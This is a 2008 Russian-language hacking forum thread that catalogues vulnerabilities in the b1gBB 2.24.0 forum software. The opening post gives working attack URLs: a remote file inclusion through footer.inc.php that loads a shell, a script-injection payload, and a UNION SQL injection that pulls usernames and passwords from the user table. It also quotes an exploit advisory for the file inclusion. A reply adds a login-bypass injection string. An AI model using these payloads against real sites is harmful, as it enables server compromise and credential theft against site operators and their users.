Форумы [Обзор уязвимостей b1gBB]

Discussion in 'Уязвимости CMS/форумов' started by OptimaPrime, 16 Apr 2008.

  1. OptimaPrime

    OptimaPrime Banned

    Joined:
    30 Mar 2007
    Messages:
    307
    Likes Received:
    588
    Reputations:
    -61
    PHP-Include
    b1gbb 2.24.0
    Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
    Уязвимость существует из-за недостаточной обработки входных данных в параметре "tfooter" в сценарии footer.inc.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP.
    Пример:
    Code:
    http://[host]/path/footer.inc.php?tfooter=[file]

    Межсайтовый скриптинг

    b1gbb 2.24.0
    Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему и выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «user» сценарием visitenkarte.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

    Пример:
    Code:
    /visitenkarte.php?user=%22%3E%3Cscript%3Ealert(1);%3C/script%3E

    SQL-инъекция

    b1gbb 2.24.0
    Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием showthread.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

    Пример
    Code:
    //showthread.php?id=-1%20union%20all%20select%200,1,2,3,4,5,6, concat(username,passwort),8%20FROM%20 cebb_user%20%20where%20id=1/*

    XSS

    Code:
    /visitenkarte.php?user=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
    Exploite
    Code:
    # b1gBB (b1g Bulletion Board) (footer.inc.php) Remote File Inclusion
    Vulnerabilities
    
    # D.Script :
         http://switch.dl.sourceforge.net/sourceforge/b1gbb/b1gbb-2.24.0.zip
    
    # V.Code :
         include $tfooter
    
    # In :
         footer.inc.php
    
    # Exploits :
    http://www.name/path/footer.inc.php?tfooter=shell?
    
    
    # Discovered by:
         Rf7awy
    [email protected]
     
    #1 OptimaPrime, 16 Apr 2008
    Last edited: 16 Apr 2008
    1 person likes this.
  2. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    и обход авторизации при magic_quotes off

    bla' or 1=1/*
     
    1 person likes this.